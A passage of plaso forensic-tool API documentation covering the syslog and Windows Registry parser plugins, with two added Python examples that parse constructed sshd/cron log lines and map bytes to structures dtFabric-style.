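        r"^Failed (?P<authentication_method>password|publickey) for "
        r"(?P<username>" + _ALPHA_WORD + r") from (?P<address>" + _ADDRESS +
        r") port (?P<port>[0-9]+)$")),
    ("opened_connection", re.compile(
        r"^Connection from (?P<address>" + _ADDRESS + r") port (?P<port>[0-9]+)$")),
]

# REPORTER values and DATA_TYPE strings as listed on this page.
PLUGINS = {"CRON": CRON_GRAMMARS, "sshd": SSH_GRAMMARS}
DATA_TYPES = {
    "task_run": "syslog:cron:task_run",
    "login": "syslog:ssh:login",
    "failed_connection": "syslog:ssh:failed_connection",
    "opened_connection": "syslog:ssh:opened_connection",
}


class WrongPlugin(Exception):
    """Raised when no grammar of the selected plugin matches the body."""


def ParseMessage(key, tokens):
    """Builds event data for a matched grammar; ValueError on an unknown key."""
    data_type = DATA_TYPES.get(key)
    if data_type is None:
        raise ValueError(f"unknown grammar key: {key}")
    event_data = {"data_type": data_type}
    event_data.update(tokens)
    return event_data


def Process(reporter, syslog_tokens):
    """Mirrors SyslogPlugin.Process for the plugin registered for reporter."""
    if "body" not in syslog_tokens:
        raise AttributeError("syslog tokens do not include a body")
    for key, pattern in PLUGINS[reporter]:
        match = pattern.match(syslog_tokens["body"])
        if match:
            tokens = {name: value for name, value in match.groupdict().items()
                      if value is not None}
            return ParseMessage(key, tokens)
    raise WrongPlugin(f"no {reporter} grammar matches {syslog_tokens['body']!r}")


# Constructed line layout "Mon DD HH:MM:SS host reporter[pid]: body"; this is
# the split the syslog parser performs before a plugin sees the tokens.
_LINE = re.compile(
    r"^\w{3} +\d{1,2} \d{2}:\d{2}:\d{2} (?P<hostname>\S+) "
    r"(?P<reporter>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<body>.*)$")


def ParseLines(lines):
    """Returns event data for each line whose reporter has a plugin and whose body matches."""
    events = []
    for line in lines:
        match = _LINE.match(line)
        if not match or match.group("reporter") not in PLUGINS:
            continue
        try:
            events.append(Process(match.group("reporter"), {"body": match.group("body")}))
        except WrongPlugin:
            continue  # right daemon, but the body fits none of the grammars
    return events


# Constructed sample lines (not from a real host).
SAMPLE_LINES = [
    "Jan 22 07:54:32 host1 sshd[1234]: Accepted publickey for alice from 192.0.2.10 port 51234 ssh2: RSA 2f:3a:5b:6c:7d:8e:9f:00:11:22:33:44:55:66:77:88",
    "Jan 22 07:55:01 host1 sshd[1240]: Connection from 198.51.100.7 port 40022",
    "Jan 22 07:55:03 host1 sshd[1240]: Failed password for bob from 198.51.100.7 port 40022",
    "Jan 22 07:55:04 host1 sshd[1240]: Failed password for invalid user admin from 198.51.100.7 port 40022",
    "Jan 22 08:00:01 host1 CRON[2001]: (root) CMD (/usr/bin/backup.sh --full)",
    "Jan 22 08:00:02 host1 systemd[1]: Started Daily apt download activities.",
]

if __name__ == "__main__":
    for event in ParseLines(SAMPLE_LINES):
        print(event)
```

The fourth sample line, a failure for an "invalid user", is deliberately left unmatched: the failed_connection grammar expects a single word between "for" and "from", so such lines yield no syslog:ssh:failed_connection event and a detection built only on that data type would not see them.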
Module contents
Imports for the syslog parser.
plaso.parsers.winreg_plugins package
Submodules
plaso.parsers.winreg_plugins.appcompatcache module
Windows Registry plugin to parse the Application Compatibility Cache key.
class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheCachedEntry
Bases: object
Application Compatibility Cache cached entry.
class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventData
Bases: plaso.containers.events.EventData
Application Compatibility Cache event data.
entry_index (int): cache entry index number for the record.
key_path (str): Windows Registry key path.
path (str): full path to the executable.
DATA_TYPE = 'windows:registry:appcompatcache'
class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheHeader
Bases: object
Application Compatibility Cache header.
class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Application Compatibility Cache data Windows Registry plugin.
DATA_FORMAT = 'Application Compatibility Cache Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Raises ParseError – if the value data could not be parsed.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'appcompatcache'
plaso.parsers.winreg_plugins.bagmru module
This file contains BagMRU Windows Registry plugins (shellbags).
class plaso.parsers.winreg_plugins.bagmru.BagMRUEventData
Bases: plaso.containers.events.EventData
BagMRU event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:bagmru'
class plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Class that defines a BagMRU Windows Registry plugin.
DATA_FORMAT = 'BagMRU (or ShellBags) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'bagmru'
plaso.parsers.winreg_plugins.bam module
Windows Registry plugin to parse the Background Activity Moderator keys.
class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventData
Bases: plaso.containers.events.EventData
Background Activity Moderator event data.
binary_path (str): binary executed.
user_sid (str): user SID associated with entry.
DATA_TYPE = 'windows:registry:bam'
class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Background Activity Moderator data Windows Registry plugin.
DATA_FORMAT = 'Background Activity Moderator (BAM) Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Raises ParseError – if the value data could not be parsed.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'bam'
plaso.parsers.winreg_plugins.ccleaner module
Parser for the CCleaner Registry key.
class plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventData
Bases: plaso.containers.events.EventData
CCleaner configuration event data.
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
DATA_TYPE = 'ccleaner:configuration'
class plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
• (App)Cookies [REG_SZ], contains “True” if the cookies should be cleaned;
• (App)Delete Index.dat files [REG_SZ]
• (App)History [REG_SZ]
• (App)Last Download Location [REG_SZ]
• (App)Other Explorer MRUs [REG_SZ]
• (App)Recent Documents [REG_SZ]
• (App)Recently Typed URLs [REG_SZ]
• (App)Run (in Start Menu) [REG_SZ]
• (App)Temporary Internet Files [REG_SZ]
• (App)Thumbnail Cache [REG_SZ]
• CookiesToSave [REG_SZ]
• UpdateKey [REG_SZ], contains a date and time formatted as: “MM/DD/YYYY hh:mm:ss [A|P]M”, for example “07/13/2013 10:03:14 AM”;
• WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
• WINDOW_LEFT [REG_SZ]
• WINDOW_MAX [REG_SZ]
• WINDOW_TOP [REG_SZ]
• WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
DATA_FORMAT = 'CCleaner Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'ccleaner'
class plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventData
Bases: plaso.containers.events.EventData
CCleaner update event data.
key_path (str): Windows Registry key path.
DATA_TYPE = 'ccleaner:update'
plaso.parsers.winreg_plugins.default module
The default Windows Registry plugin.
class plaso.parsers.winreg_plugins.default.DefaultPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Default plugin that extracts minimum information from every registry key.
The default plugin will parse every registry key that is passed to it and extract minimum information, such as a list of available values and if possible content of those values. The timestamp used is the timestamp when the registry key was last modified.
DATA_FORMAT = 'Windows Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
NAME = 'winreg_default'
plaso.parsers.winreg_plugins.dtfabric_plugin module
Shared functionality for dtFabric-based data format Registry plugins.
class plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Shared functionality for dtFabric-based data format Registry plugins.
A dtFabric-based data format Windows Registry parser plugin defines its data format structures in a dtFabric definition file, for example “dtfabric.yaml”:
name: int32
type: integer
description: 32-bit signed integer type
attributes:
  format: signed
  size: 4
  units: bytes
---
name: point3d
aliases: [POINT]
type: structure
description: Point in 3 dimensional space.
attributes:
  byte_order: little-endian
members:
- name: x
  aliases: [XCOORD]
  data_type: int32
- name: y
  data_type: int32
- name: z
  data_type: int32
The path to the definition file is defined in the class constant “_DEFINITION_FILE” and will be read on class instantiation.
The definition file contains data type definitions such as “int32” and “point3d” in the previous example.
A data type map can be used to create a Python object that represents the data type definition mapped to a byte stream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00
The corresponding “point3d” Python object would be: point3d(x=1, y=2, z=3)
A parser that wants to implement a dtFabric-based data format parser needs to:
• define a definition file and override _DEFINITION_FILE;
• implement the ParseFileObject method.
The _GetDataTypeMap method of this class can be used to retrieve data type maps from the “fabric”, which is the collection of the data type definitions in the definition file. Data type maps are cached for reuse.
The _ReadStructure method of this class can be used to read structure data from a file-like object and create a Python object using a data type map.
abstract ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
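Added example, not plaso or dtFabric code: a minimal standard-library stand-in for the "fabric" described above. It takes the page's int32 and point3d definitions (written here as Python dicts rather than YAML so no YAML library is needed), builds a cached data type map per definition, and maps the page's byte stream 01 00 00 00 02 00 00 00 03 00 00 00 onto a point3d object; ReadStructure plays the role of _ReadStructure. The class and helper names are assumptions made for this example.

```python
import collections
import io
import struct

# The page's dtfabric.yaml example, written as Python dicts whose keys mirror
# the YAML keys (definitions are kept as data, not as a YAML file).
DEFINITIONS = [
    {"name": "int32", "type": "integer",
     "attributes": {"format": "signed", "size": 4, "units": "bytes"}},
    {"name": "point3d", "aliases": ["POINT"], "type": "structure",
     "attributes": {"byte_order": "little-endian"},
     "members": [
         {"name": "x", "aliases": ["XCOORD"], "data_type": "int32"},
         {"name": "y", "data_type": "int32"},
         {"name": "z", "data_type": "int32"},
     ]},
]

# struct format characters for integer definitions, keyed by (signed?, size).
_INTEGER_FORMATS = {
    (True, 1): "b", (False, 1): "B", (True, 2): "h", (False, 2): "H",
    (True, 4): "i", (False, 4): "I", (True, 8): "q", (False, 8): "Q"}
_BYTE_ORDERS = {"little-endian": "<", "big-endian": ">"}


class DataTypeMap:
    """Maps a byte stream onto the Python object a structure definition describes."""

    def __init__(self, definition, fabric):
        if definition["type"] != "structure":
            raise ValueError("only structure definitions are supported here")
        byte_order = _BYTE_ORDERS[definition["attributes"]["byte_order"]]
        members = definition["members"]
        # Every member resolves to an integer definition in the same fabric.
        format_chars = "".join(
            fabric.GetIntegerFormat(member["data_type"]) for member in members)
        self._struct = struct.Struct(byte_order + format_chars)
        # The namedtuple is named after the definition so that repr() gives
        # the "point3d(x=1, y=2, z=3)" form shown on the page.
        self._type = collections.namedtuple(
            definition["name"], [member["name"] for member in members])

    def GetByteSize(self):
        """Returns the number of bytes one structure occupies."""
        return self._struct.size

    def MapByteStream(self, byte_stream):
        """Maps the start of byte_stream onto a structure object."""
        if len(byte_stream) < self._struct.size:
            raise ValueError(
                f"need {self._struct.size} bytes, got {len(byte_stream)}")
        return self._type(*self._struct.unpack_from(byte_stream))


class Fabric:
    """The collection of definitions; data type maps are cached for reuse."""

    def __init__(self, definitions):
        self._definitions = {}
        for definition in definitions:
            self._definitions[definition["name"]] = definition
            for alias in definition.get("aliases", []):
                self._definitions[alias] = definition
        self._data_type_maps = {}

    def GetIntegerFormat(self, name):
        """Returns the struct format character for an integer definition."""
        definition = self._definitions[name]
        if definition["type"] != "integer":
            raise ValueError(f"{name} is not an integer definition")
        attributes = definition["attributes"]
        return _INTEGER_FORMATS[
            (attributes["format"] == "signed", attributes["size"])]

    def CreateDataTypeMap(self, name):
        """Returns the cached data type map for a definition name or alias."""
        definition = self._definitions[name]
        canonical_name = definition["name"]
        if canonical_name not in self._data_type_maps:
            self._data_type_maps[canonical_name] = DataTypeMap(definition, self)
        return self._data_type_maps[canonical_name]


def ReadStructure(fabric, name, file_object):
    """Reads one structure from a file-like object, as _ReadStructure does."""
    data_type_map = fabric.CreateDataTypeMap(name)
    byte_stream = file_object.read(data_type_map.GetByteSize())
    return data_type_map.MapByteStream(byte_stream)


if __name__ == "__main__":
    # The byte stream from the page: 01 00 00 00 02 00 00 00 03 00 00 00
    fabric = Fabric(DEFINITIONS)
    stream = io.BytesIO(bytes.fromhex("010000000200000003000000"))
    print(ReadStructure(fabric, "point3d", stream))  # point3d(x=1, y=2, z=3)
```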
plaso.parsers.winreg_plugins.interface module
The Windows Registry plugin interface.
class plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
Bases: object
The Windows Registry key filter interface.
abstract Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the keys match.
Return type bool
property key_paths (list[str]): key paths defined by the filter.
class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter(key_path)
Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
Windows Registry key path filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the keys match.
Return type bool
property key_paths
List of key paths defined by the filter.
class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathPrefixFilter(key_path_prefix)
Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
Windows Registry key path prefix filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the keys match.
Return type bool
class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathSuffixFilter(key_path_suffix)
Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
Windows Registry key path suffix filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the keys match.
Return type bool
class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter(value_names)
Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
Windows Registry key with values filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the keys match.
Return type bool
class plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Bases: plaso.parsers.plugins.BasePlugin
The Windows Registry plugin interface.
DATA_FORMAT = 'Windows Registry data'
abstract ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({})
NAME = 'winreg_plugin'
Process(parser_mediator, registry_key, **kwargs)
Processes a Windows Registry key or value.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Raises ValueError – If the Windows Registry key is not set.
UpdateChainAndProcess(parser_mediator, registry_key, **kwargs)
Updates the parser chain and processes a Windows Registry key or value.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Raises ValueError – If the Windows Registry key is not set.
plaso.parsers.winreg_plugins.lfu module
Plug-in to collect the Less Frequently Used Keys.
class plaso.parsers.winreg_plugins.lfu.BootExecutePlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plug-in to collect the BootExecute Value from the Session Manager key.
Also see: http://technet.microsoft.com/en-us/library/cc963230.aspx
DATA_FORMAT = 'Boot Execution Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_boot_execute'
class plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Plug-in to collect the Boot Verification Key.
Also see: http://technet.microsoft.com/en-us/library/cc782537(v=ws.10).aspx
DATA_FORMAT = 'Windows boot verification Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'windows_boot_verify'
class plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventData
Bases: plaso.containers.events.EventData
Windows Boot Execute event data attribute container.
key_path (str): Windows Registry key path.
value (str): boot execute value, contains the value obtained from the BootExecute Registry value.
DATA_TYPE = 'windows:registry:boot_execute'
class plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventData
Bases: plaso.containers.events.EventData
Windows Boot Verification event data attribute container.
image_path (str): location of the boot verification executable, contains the value obtained from the ImagePath Registry value.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:boot_verification'
plaso.parsers.winreg_plugins.mountpoints module
MountPoints2 Windows Registry parser plugin.
class plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData
Bases: plaso.containers.events.EventData
Windows MountPoints2 event data attribute container.
key_path (str): Windows Registry key path.
label (str): mount point label.
name (str): name of the mount point source.
server_name (str): name of the remote drive server or None if not set.
share_name (str): name of the remote drive share or None if not set.
type (str): type of the mount point source, which can be “Drive”, “Remove Drive” or “Volume”.
DATA_TYPE = 'windows:registry:mount_points2'
class plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing the MountPoints2 key.
DATA_FORMAT = 'Windows Explorer mount points Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'explorer_mountpoints2'
plaso.parsers.winreg_plugins.mrulist module
This file contains an MRUList Registry plugin.
Also see: https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc
class plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Class for common MRUList Windows Registry plugin functionality.
class plaso.parsers.winreg_plugins.mrulist.MRUListEventData
Bases: plaso.containers.events.EventData
MRUList event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:mrulist'
class plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin
Windows Registry plugin to parse a shell item list MRUList.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mrulist_shell_item_list'
class plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter
Windows Registry key with values filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the Windows Registry key matches the filter.
Return type bool
class plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin
Windows Registry plugin to parse a string MRUList.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.mrulist.MRUListStringRegistryKeyFilter object>})
NAME = 'mrulist_string'
plaso.parsers.winreg_plugins.mrulistex module
This file contains MRUListEx Windows Registry plugins.
Also see: https://github.com/libyal/winreg-kb/blob/master/documentation/MRU%20keys.asciidoc
class plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin
Class for common MRUListEx Windows Registry plugin functionality.
class plaso.parsers.winreg_plugins.mrulistex.MRUListExEventData
Bases: plaso.containers.events.EventData
MRUListEx event data attribute container.
entries (str): most recently used (MRU) entries.
key_path (str): Windows Registry key path.
DATA_TYPE = 'windows:registry:mrulistex'
class plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
Windows Registry plugin to parse a shell item list MRUListEx.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mrulistex_shell_item_list'
class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
Windows Registry plugin to parse a string and shell item list MRUListEx.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mrulistex_string_and_shell_item_list'
class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
Windows Registry plugin to parse a string and shell item MRUListEx.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'mrulistex_string_and_shell_item'
class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter
Windows Registry key with values filter.
Match(registry_key)
Determines if a Windows Registry key matches the filter.
Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
Returns True if the Windows Registry key matches the filter.
Return type bool
class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin
Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin
Windows Registry plugin to parse a string MRUListEx.
DATA_FORMAT = 'Most Recently Used (MRU) Registry data'
ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
• codepage (Optional[str]) – extended ASCII string codepage.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter object>})
NAME = 'mrulistex_string'
plaso.parsers.winreg_plugins.msie_zones module
This file contains the MSIE zone settings plugin.
class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventData
Bases: plaso.containers.events.EventData
MSIE zone settings event data attribute container.
key_path (str): Windows Registry key path.
settings (str): MSIE zone settings.
DATA_TYPE = 'windows:registry:msie_zone_settings'
class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing the MSIE zone settings.
The MSIE Feature controls are stored in the Zone specific subkeys in:
Internet Settings\Zones key
Internet Settings\Lockdown_Zones key
Also see: http://support.microsoft.com/kb/182569
DATA_FORMAT = 'Microsoft Internet Explorer zone settings Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
NAME = 'msie_zone'
plaso.parsers.winreg_plugins.network_drives module
This file contains the Network drive Registry plugin.
class plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData
Bases: plaso.containers.events.EventData
Network drive event data attribute container.
drive_letter (str): drive letter assigned to the network drive.
key_path (str): Windows Registry key path.
server_name (str): name of the server of the network drive.
share_name (str): name of the share of the network drive.
DATA_TYPE = 'windows:registry:network_drive'
class plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin
Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
Windows Registry plugin for parsing the Network key.
DATA_FORMAT = 'Windows network drives Registry data'
ExtractEvents(parser_mediator, registry_key, **kwargs)
Extracts events from a Windows Registry key.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})
